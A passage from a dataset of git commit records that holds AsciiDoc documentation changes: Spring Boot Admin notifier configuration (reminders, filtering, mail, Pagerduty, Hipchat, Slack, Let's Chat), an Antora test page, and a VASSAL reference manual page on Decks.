`OFFLINE`. You can alter this behaviour via `setReminderStatuses()`. The reminder ends when either the status changes to a non-triggering status or the regarding application gets deregistered.\n\nBy default the reminders are sent every 10 minutes, to change this use `setReminderPeriod()`. The `RemindingNotifier` itself doesn't start the background thread to send the reminders, you need to take care of this as shown in the given example below;\n\n.How to configure reminders\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n @Autowired\n private Notifier notifier;\n\n @Bean\n @Primary\n public RemindingNotifier remindingNotifier() {\n RemindingNotifier remindingNotifier = new RemindingNotifier(notifier);\n remindingNotifier.setReminderPeriod(TimeUnit.MINUTES.toMillis(5)); \/\/ <1>\n return remindingNotifier;\n }\n\n @Scheduled(fixedRate = 60_000L) \/\/ <2>\n public void remind() {\n remindingNotifier().sendReminders();\n }\n}\n----\n<1> The reminders will be sent every 5 minutes.\n<2> Schedules sending of due reminders every 60 seconds.\n\n[[filtering-notifications]]\n==== Filtering notifications ====\nThe `FilteringNotifier` allows you to filter certain notification based on rules you can add\/remove at runtime. It delegates the sending of notifications to another notifier.\n\nIf you add a `FilteringNotifier` to your `ApplicationContext` a RESTful interface on `api\/notifications\/filter` gets available. When this happens the ui shows options to manage the filters.\n\nThis notifier is useful if you don't want recieve notifications when deploying your applications. Before stopping the application you can add an (expiring) filter either via a `POST` request or the ui.\n\n.How to configure filtering\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n\t@Autowired\n\tprivate Notifier delegate;\n\n\t@Bean\n\tpublic FilteringNotifier filteringNotifier() { \/\/ <1>\n\t\treturn new FilteringNotifier(delegate);\n\t}\n\n\t@Bean\n\t@Primary\n\tpublic RemindingNotifier remindingNotifier() { \/\/ <2>\n\t\tRemindingNotifier notifier = new RemindingNotifier(filteringNotifier());\n\t\tnotifier.setReminderPeriod(TimeUnit.SECONDS.toMillis(10));\n\t\treturn notifier;\n\t}\n\n\t@Scheduled(fixedRate = 1_000L)\n\tpublic void remind() {\n\t\tremindingNotifier().sendReminders();\n\t}\n}\n----\n<1> Add the `FilteringNotifier` bean using a delegate (e.g. `MailNotifier` when configured)\n<2> Add the `RemindingNotifier` as primary bean using the `FilteringNotifier` as delegate.\n\nTIP: This examples combines the reminding and filtering notifiers. This allows you to get notifications after the deployed applications hasn't restarted in a certain amount of time (until the filter expires).\n\n[[mail-notifications]]\n==== Mail notifications ====\n\nConfigure a `JavaMailSender` using `spring-boot-starter-mail` and set a recipient.\n\n[source,xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-mail<\/artifactId>\n<\/dependency>\n----\n\n.application.properties\n----\nspring.mail.host=smtp.example.com\nspring.boot.admin.notify.mail.to=admin@example.com\n----\n\n.Mail notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.mail.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.mail.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.mail.to\n| Comma-delimited list of mail recipients\n| `\"root@localhost\"`\n\n| spring.boot.admin.notify.mail.cc\n| Comma-delimited list of carbon-copy recipients\n|\n\n| spring.boot.admin.notify.mail.from\n| Mail sender\n|\n\n| spring.boot.admin.notify.mail.subject\n| Mail subject. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id}) is #{to.status}\"+++`\n\n| spring.boot.admin.notify.mail.text\n| Mail body. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id})\\nstatus changed from #{from.status} to #{to.status}\\n\\n#{application.healthUrl}\"+++`\n|===\n\n[[pagerduty-notifications]]\n==== Pagerduty notifications ====\nTo enable pagerduty notifications you just have to add a generic service to your pagerduty-account and set `spring.boot.admin.notify.pagerduty.service-key` to the service-key you received.\n\n.Pagerduty notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.pagerduty.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.pagerduty.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.pagerduty.service-key\n| Service-key to use for Pagerduty\n|\n\n| spring.boot.admin.notify.pagerduty.url\n| The Pagerduty-rest-api url\n| `+++\"https:\/\/events.pagerduty.com\/generic\/2010-04-15\/create_event.json\"+++`\n\n| spring.boot.admin.notify.pagerduty.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"#{application.name}\/#{application.id} is #{to.status}\"+++`\n\n| spring.boot.admin.notify.pagerduty.client\n| Client-name to use in the event\n|\n\n| spring.boot.admin.notify.pagerduty.client-url\n| Client-url to use in the event\n|\n|===\n\n[hipchat-notifications]\n==== Hipchat notifications ====\nTo enable Hipchat notifications you need to create an API token from you Hipchat account and set the appropriate configuration properties.\n\n.Hipchat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.hipchat.enabled\n| Enable Hipchat notifications\n| `true`\n\n| spring.boot.admin.notify.hipchat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.hipchat.url\n| The HipChat REST API (V2) URL\n|\n\n| spring.boot.admin.notify.hipchat.auth-token\n| The API token with access to the notification room\n|\n\n| spring.boot.admin.notify.hipchat.room-id\n| The ID or url-encoded name of the room to send notifications to\n|\n\n| spring.boot.admin.notify.hipchat.notify\n| Whether the message should trigger a user notification\n| `false`\n\n| spring.boot.admin.notify.hipchat.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"<strong>#{application.name}<\/strong>\/#{application.id} is <strong>#{to.status}<\/strong>\"+++`\n|\n|===\n\n[slack-notifications]\n==== Slack notifications ====\nTo enable Slack notifications you need to add a incoming Webhook under custom integrations on your Slack\naccount and configure it appropriately.\n\n.Slack notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.slack.enabled\n| Enable Slack notifications\n| `true`\n\n| spring.boot.admin.notify.slack.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.slack.webhook-url\n| The Slack Webhook URL to send notifications\n|\n\n| spring.boot.admin.notify.slack.channel\n| Optional channel name (without # at the beginning). If different than channel in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.icon\n| Optional icon name (without surrounding colons). If different than icon in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.username\n| Optional username to send notification if different than in Slack Webhooks settings\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.slack.message\n| Message to use in the event. SpEL-expressions and Slack markups are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n\n[letschat-notifications]\n==== Let\u00b4s Chat notifications ====\nTo enable Let\u00b4s Chat notifications you need to add the host url and add the API token and username from Let\u00b4s Chat\n\n.Let\u00b4s Chat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.letschat.enabled\n| Enable let\u00b4s Chat notifications\n| `true`\n\n| spring.boot.admin.notify.letschat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.letschat.url\n| The let\u00b4s Chat Host URL to send notifications\n|\n\n| spring.boot.admin.notify.letschat.room\n| the room where to send the messages\n|\n\n| spring.boot.admin.notify.letschat.token\n| the token to access the let\u00b4s Chat API\n|\n\n| spring.boot.admin.notify.letschat.username\n| The username for which the token was created\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.letschat.message\n| Message to use in the event. SpEL-expressions are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e9bc17f2bf178a779608e8c66fd0a7cd134a7b8","subject":"adding page title and description","message":"adding page title and description\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"testData\/psi\/antoraModule\/componentV1\/modules\/module\/pages\/page.adoc","new_file":"testData\/psi\/antoraModule\/componentV1\/modules\/module\/pages\/page.adoc","new_contents":"= The page in the other module\n:description: a description\n:page-aliases: ROOT:oldpagename.adoc\n","old_contents":":page-aliases: ROOT:oldpagename.adoc\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04ab7fe6b656dccd4cb9aea30cf20daeb512b81e","subject":"Deck Documentation update","message":"Deck Documentation update\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Deck.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Deck.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<Map.adoc#top,Map>> > *Deck*#\n\n'''''\n\n=== Deck\n\nA Deck functions like a deck of playing cards, but can also be used to hold a supply of other types of <<GamePiece.adoc#top,Game Piece>>, such as a fixed supply of counters or a \"bag of chits\" to be randomly drawn from.\n Each game begins with the contents of the Deck as specified in the Configuration window.\nDuring a game, players may remove cards from the deck by dragging them from the top of the deck with the mouse.\nThis removes a card from the Deck and assigns ownership to the dragging player.\nDragging a card onto the deck adds it back to the Deck.\n\nThe number of cards or pieces in the deck is exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_numPieces._ +\nThe number of card or piece types in the deck can be exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_<type>_ (see Perform Counting of Piece Types below).\n\nDecks can be added to <<Map.adoc#top,Maps>>, and also to <<PlayerHand.adoc#top,Player Hands>> and <<PrivateWindow.adoc#top,Private Windows>>, each of which is simply a specialized type of Map.\nTo add a Deck, navigate to the _[Map]_, _[Player Hand]_, or _[Private Window]_ component entry in the Editor configuration window for the Map (or specialized map) you wish to add the Deck to.\nRight-click on that component and select _Add Deck_ from the menu.\nAfter you have configured your Deck and clicked the OK button, your new _[Deck]_ component will appear at the bottom of the map's list of Sub-Components.\nYou can then right-click on the _[Deck]_ entry and begin adding Cards and other Deck Sub-Components.\n\nNOTE: Because Decks are quite often used to hold \"cards\", the Game Pieces contained within a Deck will be frequently referred to in Vassal and in documentation as \"cards\". However keep in mind that a \"card\" is simply a type of Game Piece, and a Deck can be used to contain _any_ type of Game Piece.\nThe difference between a \"card\" and a \"piece\" is only notional, and perhaps represented in the artwork and function of the piece\/card.\n\n\n*EXAMPLE:* An ordinary deck of playing cards for, say, Crazy Eights would be set to: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Always_, _Re-shuffle = Always_, _Reversible = false_.\nThe discard pile would be: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\n\nA Deck may contain any kind of Game Piece, so it can also be used for draw piles of chits or counters that are drawn randomly and whose total number are limited by the game.\nIf the pieces\/cards do not need to be selected randomly and you simply wish to provide a pile of them on the board at game start, consider an <<SetupStack.adoc#top,At-Start Stack>>.\n\n*EXAMPLE:* A strategic game in which a nationality has a fixed force pool of variable-strength Infantry, Armor, etc.\ncounters can be modeled by making a Map Window representing the force pool, with a Deck of Infantry counters, a Deck of Armor counters, etc.\nThe decks would be set to _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\nIn order to guarantee that the number of each type of counter is fixed, any Clone and Delete traits of the Infantry and Armor counters should be removed.\n\n*EXAMPLE:* You want to create a deck of playing cards and display the number of red cards, the number of black cards, the number of face cards, and the total number of cards in the deck.\nCreate the Deck, check _Perform counting of expressions_.\nAdd the expressions of _red: color = red_ and _black: color = black_.\nAlso add the expression _facecards: value > 10_.\nWhen creating your cards, give them a <<PropertyMarker.adoc#top,Marker>> trait named _color_ with the values of _red_ or _black_ depending on the card.\nAlso give your cards a Marker trait named _value_ with the numeric value of the card.\nThen, you can refer to the counts with the map-level properties of _<deckname>_red_, _<deckname>_black_, and _<deckname>_facecards_.\nThe total number of cards currently in the deck can be referenced by the map-level property of _<deckname>_numPieces_.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\n|*Name:*:: The name of a Deck is not used during game play.\nIt is only used for identification in the Editor.\nThe name should be unique.\nIf multiple decks with the same name are created the return to deck trait will send cards to the first deck with that name.\n\n*Belongs to board:*:: If a name is selected, the Deck will appear on that particular <<Board.adoc#top,Board>>. If a game does not use that Board, then the Deck will not appear.\nIf \"<any>\" is selected, then the Deck will always appear at the given position, regardless of the boards in use.\n\n*X,Y position:*:: The position in the Map Window of the center of the deck.\nIf this Deck belongs to a Board, the position is relative to the Board's position in the Map Window.\n\n*Width, Height:*:: The size of the \"tray\" holding the cards.\nIf the Deck is empty, this determines the area into which players may drag cards to add them back to the Deck, as well as the box drawn if the _Draw Outline When Empty_ option is selected below.\nIt should be set to approximately the same size as the cards the Deck will hold.\n\n*Allow multiple cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that prompts the user to specify the number of cards to be drawn from the Deck with the next drag.\n\n*Menu command to draw multiple:*:: The text of the menu option to draw multiple cards from the deck when the draw multiple option is selected.\n\n*Allow specific cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that allows the player to examine the Deck and select exactly which cards will be drawn from the deck with the next drag.\n\n*Menu command to draw specific:*:: The text of the menu option to draw specific cards from the deck when the draw specific option is selected.\n\n*When selecting, list cards using:*:: When the player is prompted to select specific cards from the Deck, individual cards will be listed using the specified <<MessageFormat.adoc#top,Message Format>>.\n\n*When selecting, sort cards by:*:: When the player is prompted to select specific cards from the deck, the cards can optionally be sorted (alphabetically) using the listed property.\nLeave blank to list cards by their current position in the deck.\n+\nNOTE: Unlike the previous field this field simply names a single property, and should not use $..$ markers. To sort by multiple fields a <<CalculatedProperty.adoc#top,Calculated Property>> trait e.g. _SortName_ can be created and serve to concatenate the various fields in an appropriate order.\n+\n*Example:* cards in a deck can use a <<PropertyMarker.adoc#top,Marker>> trait to specify a card number (001,002, etc.) and always list cards in order of their assigned number: in this case simply fill _CardNum_ into the field, no $..$.\n\n*Contents are face-down:*:: Determines whether cards in the Deck are always drawn face-down, always drawn face-up, or can be switched from face-up to face-down with a right-click context menu entry.\n\n*Menu command to turn deck face up:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face up.\n\n*Menu command to turn deck face down:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face down.\n\n*Draw new cards face up:*:: If checked, then cards drawn from this Deck (e.g. by dragging them) will be placed face-up on the playing area.\nIf unchecked, then cards from a face-down deck are drawn face down and owned by the drawing player.\n\n*Face down report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Face Down_ menu item (if enabled above): _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Re-shuffle:*:: If set to _Never_ then cards remain in their original order; cards are drawn from and added to the top.\nIf set to _Always_ then cards are always drawn randomly from the deck.\nIf set to _Via right-click menu_ then a _Shuffle_ entry is added to the Deck's right-click context menu.\n\n*Re-shuffle menu command:*:: The right-click context menu entry for reshuffling the Deck.\n\n*Re-shuffle report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Shuffle_ menu item (if enabled above): _deckName_ is the name of this Deck, _commandName_ is the name of the context menu item.\n\n*Re-shuffle hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reshuffle.\nIf left blank, a reshuffle can be caused only with the right-click context menu.\n\n*Reversible:*:: Adds an entry to the right-click context menu that reverses the order of cards in the Deck.\n\n*Reverse menu command:*:: The right-click context menu entry for reversing the Deck.\n\n*Reverse report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log window whenever a player selects the \"Reverse\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Reverse hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reverse.\n\n*Draw Outline When Empty?*:: Whether to draw the \"tray\" for the cards.\nThe \"tray\" is a rectangle of size _width,height_ centered at _x,y_.\nOnly drawn when there are no cards in the Deck, to indicate where to drag cards to place them back in the Deck.\nMay not be necessary or desirable if the Map Window contains a board on which the tray is already shown.\n\n*Color:*:: The color used to draw the rectangle representing the \"tray\" above.\n\n*Hotkey to send when Deck empties:*:: Select the <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> to send whenever enough cards are removed from the Deck to empty it.\n\n*Include command to send entire deck to another deck:*:: If checked, the right-click context menu for this Deck will include a command that sends every Game Piece in this Deck to a different designated Deck.\nFor example, this can be used to reshuffle a discard pile into its original deck.\nThe following four attributes are used to configure this option.\n\n*Send menu command:*:: The text for the right-click context menu item.\n\n*Send report format:*:: A <<MessageFormat.adoc#top,Send Message Format>> that is echoed to the chat log window whenever a player selects the \"send to another deck\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Send Hotkey:*:: Select a <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> that will cause the Deck contents to be moved to the target Deck.\n\n*Name of deck to send to:*:: The name of the Deck that the contents of this Deck will be sent to.\n\n*Can be saved-to\/loaded-from a file:*:: If selected, the right-click context menu will include _Save_ and _Load_ actions.\nThe _Save_ action saves the contents of a deck to a file.\nThe _Load_ action replaces the contents of the deck with the cards specified in the file.\nSaved decks can be loaded into an entirely different game than the one used to save the deck.\nThis option is useful for collectible card games, in which a player may prepare a deck offline in preparation for a game.\n\n*Maximum cards to be displayed in stack:*:: This defines the maximum number of cards to graphically display in the Deck.\nThe default is 10.\nFor example, if set to 10, a deck of 52 cards will appear to have 10 cards, until the actual number of contents drops below 10.\nThen the deck will visually start to shrink as cards are removed.\nIf set to 1, the deck will always appear flat as if it held only a single card.\n\n*Perform counting of property expressions:*:: Enable processing of property expression counting.\nExpressions must be defined.\n\n*Expressions to count:*:: Specify expressions to be counted within the deck.\nThese can be whatever you like and must be in the format of:\n+\n....\n<expression name> : <expression>\n....\n+\nFor each expression, a map-level property called __<deckName>_<expression name>__ is exposed.\nThe exposed value is number of pieces for which that expression evaluates to _true_.\nAn example of how to do this is provided below.\n\nNOTE: Currently, the only \"dynamic\" property which can be used in counting expressions is _playerSide_.\nOther dynamic properties will most likely not update if they change after pieces move into a deck.\n\n*Restrict adding counters by Drag 'n Drop:*::\nWhen selected, you can add an expressions that Cards must satisfy to be allowed to be added to a Deck manually by Drag 'n Drop movement. If a Player drops a card onto the Deck that does not satisfy the expression, then the card will 'snap' back to where it was dragged from.\n\nNOTE: This option does NOT affect cards being added to the Deck by any other mechanism, other than manual Drag 'n Drop.\n\n*Dropped counters must match expression:*::\nEnter a <<PropertyMatchExpression.adoc#top,Property Match Expression>> that when evaluated against each Card must evaluate to true to allow the Card to be added to the Deck.\n\n|image:images\/Deck.png[]\n\n|===\n\n'''''\n\n=== Sub-Components\n\nSub-Components can be added to a Deck by right-clicking on the _[Deck]_ entry in the Module Editor and selecting the appropriate _Add_ option.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\na|\n==== <<GamePiece.adoc#top,Card>>\n\nA Card is identical to a Game Piece, but is initialized with a <<Mask.adoc#top,Mask>> trait appropriate for a playing card.\n\n==== <<DeckGlobalKeyCommand.adoc#top,Deck Global Key Command>>\n\nGlobal Key Commands can be added to a Deck and will appear in the right-click context menu of the Deck.\nThe resulting Global Key Command will be applied _only_ to pieces contained in the Deck.\n\n==== <<DeckSendKeyCommand.adoc#top,Deck Send Key Command>>\nA Deck Send Key Command adds a command to the right-click context menu of the Deck that provides extended options for sending cards in this Deck to another Deck.\n\n==== <<DeckSortKeyCommand.adoc#top,Deck Sort Key Command>>\nA Deck Sort Key Commands adds a command to the right-click context menu of the Deck that allows the Deck to be sorted based on the values of properties on the contained cards.\n\n|image:images\/DeckAdd.png[] +\n|===\n\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<Map.adoc#top,Map>> > *Deck*#\n\n'''''\n\n=== Deck\n\nA Deck functions like a deck of playing cards, but can also be used to hold a supply of other types of <<GamePiece.adoc#top,Game Piece>>, such as a fixed supply of counters or a \"bag of chits\" to be randomly drawn from.\n Each game begins with the contents of the Deck as specified in the Configuration window.\nDuring a game, players may remove cards from the deck by dragging them from the top of the deck with the mouse.\nThis removes a card from the Deck and assigns ownership to the dragging player.\nDragging a card onto the deck adds it back to the Deck.\n\nThe number of cards or pieces in the deck is exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_numPieces._ +\nThe number of card or piece types in the deck can be exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_<type>_ (see Perform Counting of Piece Types below).\n\nDecks can be added to <<Map.adoc#top,Maps>>, and also to <<PlayerHand.adoc#top,Player Hands>> and <<PrivateWindow.adoc#top,Private Windows>>, each of which is simply a specialized type of Map.\nTo add a Deck, navigate to the _[Map]_, _[Player Hand]_, or _[Private Window]_ component entry in the Editor configuration window for the Map (or specialized map) you wish to add the Deck to.\nRight-click on that component and select _Add Deck_ from the menu.\nAfter you have configured your Deck and clicked the OK button, your new _[Deck]_ component will appear at the bottom of the map's list of Sub-Components.\nYou can then right-click on the _[Deck]_ entry and begin adding Cards and other Deck Sub-Components.\n\nNOTE: Because Decks are quite often used to hold \"cards\", the Game Pieces contained within a Deck will be frequently referred to in Vassal and in documentation as \"cards\". However keep in mind that a \"card\" is simply a type of Game Piece, and a Deck can be used to contain _any_ type of Game Piece.\nThe difference between a \"card\" and a \"piece\" is only notional, and perhaps represented in the artwork and function of the piece\/card.\n\n\n*EXAMPLE:* An ordinary deck of playing cards for, say, Crazy Eights would be set to: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Always_, _Re-shuffle = Always_, _Reversible = false_.\nThe discard pile would be: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\n\nA Deck may contain any kind of Game Piece, so it can also be used for draw piles of chits or counters that are drawn randomly and whose total number are limited by the game.\nIf the pieces\/cards do not need to be selected randomly and you simply wish to provide a pile of them on the board at game start, consider an <<SetupStack.adoc#top,At-Start Stack>>.\n\n*EXAMPLE:* A strategic game in which a nationality has a fixed force pool of variable-strength Infantry, Armor, etc.\ncounters can be modeled by making a Map Window representing the force pool, with a Deck of Infantry counters, a Deck of Armor counters, etc.\nThe decks would be set to _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\nIn order to guarantee that the number of each type of counter is fixed, any Clone and Delete traits of the Infantry and Armor counters should be removed.\n\n*EXAMPLE:* You want to create a deck of playing cards and display the number of red cards, the number of black cards, the number of face cards, and the total number of cards in the deck.\nCreate the Deck, check _Perform counting of expressions_.\nAdd the expressions of _red: color = red_ and _black: color = black_.\nAlso add the expression _facecards: value > 10_.\nWhen creating your cards, give them a <<PropertyMarker.adoc#top,Marker>> trait named _color_ with the values of _red_ or _black_ depending on the card.\nAlso give your cards a Marker trait named _value_ with the numeric value of the card.\nThen, you can refer to the counts with the map-level properties of _<deckname>_red_, _<deckname>_black_, and _<deckname>_facecards_.\nThe total number of cards currently in the deck can be referenced by the map-level property of _<deckname>_numPieces_.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\n|*Name:*:: The name of a Deck is not used during game play.\nIt is only used for identification in the Editor.\nThe name should be unique.\nIf multiple decks with the same name are created the return to deck trait will send cards to the first deck with that name.\n\n*Belongs to board:*:: If a name is selected, the Deck will appear on that particular <<Board.adoc#top,Board>>. If a game does not use that Board, then the Deck will not appear.\nIf \"<any>\" is selected, then the Deck will always appear at the given position, regardless of the boards in use.\n\n*X,Y position:*:: The position in the Map Window of the center of the deck.\nIf this Deck belongs to a Board, the position is relative to the Board's position in the Map Window.\n\n*Width, Height:*:: The size of the \"tray\" holding the cards.\nIf the Deck is empty, this determines the area into which players may drag cards to add them back to the Deck, as well as the box drawn if the _Draw Outline When Empty_ option is selected below.\nIt should be set to approximately the same size as the cards the Deck will hold.\n\n*Allow multiple cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that prompts the user to specify the number of cards to be drawn from the Deck with the next drag.\n\n*Menu command to draw multiple:*:: The text of the menu option to draw multiple cards from the deck when the draw multiple option is selected.\n\n*Allow specific cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that allows the player to examine the Deck and select exactly which cards will be drawn from the deck with the next drag.\n\n*Menu command to draw specific:*:: The text of the menu option to draw specific cards from the deck when the draw specific option is selected.\n\n*When selecting, list cards using:*:: When the player is prompted to select specific cards from the Deck, individual cards will be listed using the specified <<MessageFormat.adoc#top,Message Format>>.\n\n*When selecting, sort cards by:*:: When the player is prompted to select specific cards from the deck, the cards can optionally be sorted (alphabetically) using the listed property.\nLeave blank to list cards by their current position in the deck.\n+\nNOTE: Unlike the previous field this field simply names a single property, and should not use $..$ markers. To sort by multiple fields a <<CalculatedProperty.adoc#top,Calculated Property>> trait e.g. _SortName_ can be created and serve to concatenate the various fields in an appropriate order.\n+\n*Example:* cards in a deck can use a <<PropertyMarker.adoc#top,Marker>> trait to specify a card number (001,002, etc.) and always list cards in order of their assigned number: in this case simply fill _CardNum_ into the field, no $..$.\n\n*Contents are face-down:*:: Determines whether cards in the Deck are always drawn face-down, always drawn face-up, or can be switched from face-up to face-down with a right-click context menu entry.\n\n*Menu command to turn deck face up:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face up.\n\n*Menu command to turn deck face down:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face down.\n\n*Draw new cards face up:*:: If checked, then cards drawn from this Deck (e.g. by dragging them) will be placed face-up on the playing area.\nIf unchecked, then cards from a face-down deck are drawn face down and owned by the drawing player.\n\n*Face down report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Face Down_ menu item (if enabled above): _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Re-shuffle:*:: If set to _Never_ then cards remain in their original order; cards are drawn from and added to the top.\nIf set to _Always_ then cards are always drawn randomly from the deck.\nIf set to _Via right-click menu_ then a _Shuffle_ entry is added to the Deck's right-click context menu.\n\n*Re-shuffle menu command:*:: The right-click context menu entry for reshuffling the Deck.\n\n*Re-shuffle report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Shuffle_ menu item (if enabled above): _deckName_ is the name of this Deck, _commandName_ is the name of the context menu item.\n\n*Re-shuffle hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reshuffle.\nIf left blank, a reshuffle can be caused only with the right-click context menu.\n\n*Reversible:*:: Adds an entry to the right-click context menu that reverses the order of cards in the Deck.\n\n*Reverse menu command:*:: The right-click context menu entry for reversing the Deck.\n\n*Reverse report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log window whenever a player selects the \"Reverse\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Reverse hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reverse.\n\n*Draw Outline When Empty?*:: Whether to draw the \"tray\" for the cards.\nThe \"tray\" is a rectangle of size _width,height_ centered at _x,y_.\nOnly drawn when there are no cards in the Deck, to indicate where to drag cards to place them back in the Deck.\nMay not be necessary or desirable if the Map Window contains a board on which the tray is already shown.\n\n*Color:*:: The color used to draw the rectangle representing the \"tray\" above.\n\n*Hotkey to send when Deck empties:*:: Select the <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> to send whenever enough cards are removed from the Deck to empty it.\n\n*Include command to send entire deck to another deck:* If checked, the right-click context menu for this Deck will include a command that sends every Game Piece in this Deck to a different designated Deck.\nFor example, this can be used to reshuffle a discard pile into its original deck.\nThe following four attributes are used to configure this option.\n\n*Send menu command:*:: The text for the right-click context menu item.\n\n*Send report format:*:: A <<MessageFormat.adoc#top,Send Message Format>> that is echoed to the chat log window whenever a player selects the \"send to another deck\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Send Hotkey:*:: Select a <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> that will cause the Deck contents to be moved to the target Deck.\n\n*Name of deck to send to:*:: The name of the Deck that the contents of this Deck will be sent to.\n\n*Can be saved-to\/loaded-from a file:*:: If selected, the right-click context menu will include _Save_ and _Load_ actions.\nThe _Save_ action saves the contents of a deck to a file.\nThe _Load_ action replaces the contents of the deck with the cards specified in the file.\nSaved decks can be loaded into an entirely different game than the one used to save the deck.\nThis option is useful for collectible card games, in which a player may prepare a deck offline in preparation for a game.\n\n*Maximum cards to be displayed in stack:*:: This defines the maximum number of cards to graphically display in the Deck.\nThe default is 10.\nFor example, if set to 10, a deck of 52 cards will appear to have 10 cards, until the actual number of contents drops below 10.\nThen the deck will visually start to shrink as cards are removed.\nIf set to 1, the deck will always appear flat as if it held only a single card.\n\n*Perform counting of property expressions:*:: Enable processing of property expression counting.\nExpressions must be defined.\n\n*Expressions to count:*:: Specify expressions to be counted within the deck.\nThese can be whatever you like and must be in the format of:\n+\n....\n<expression name> : 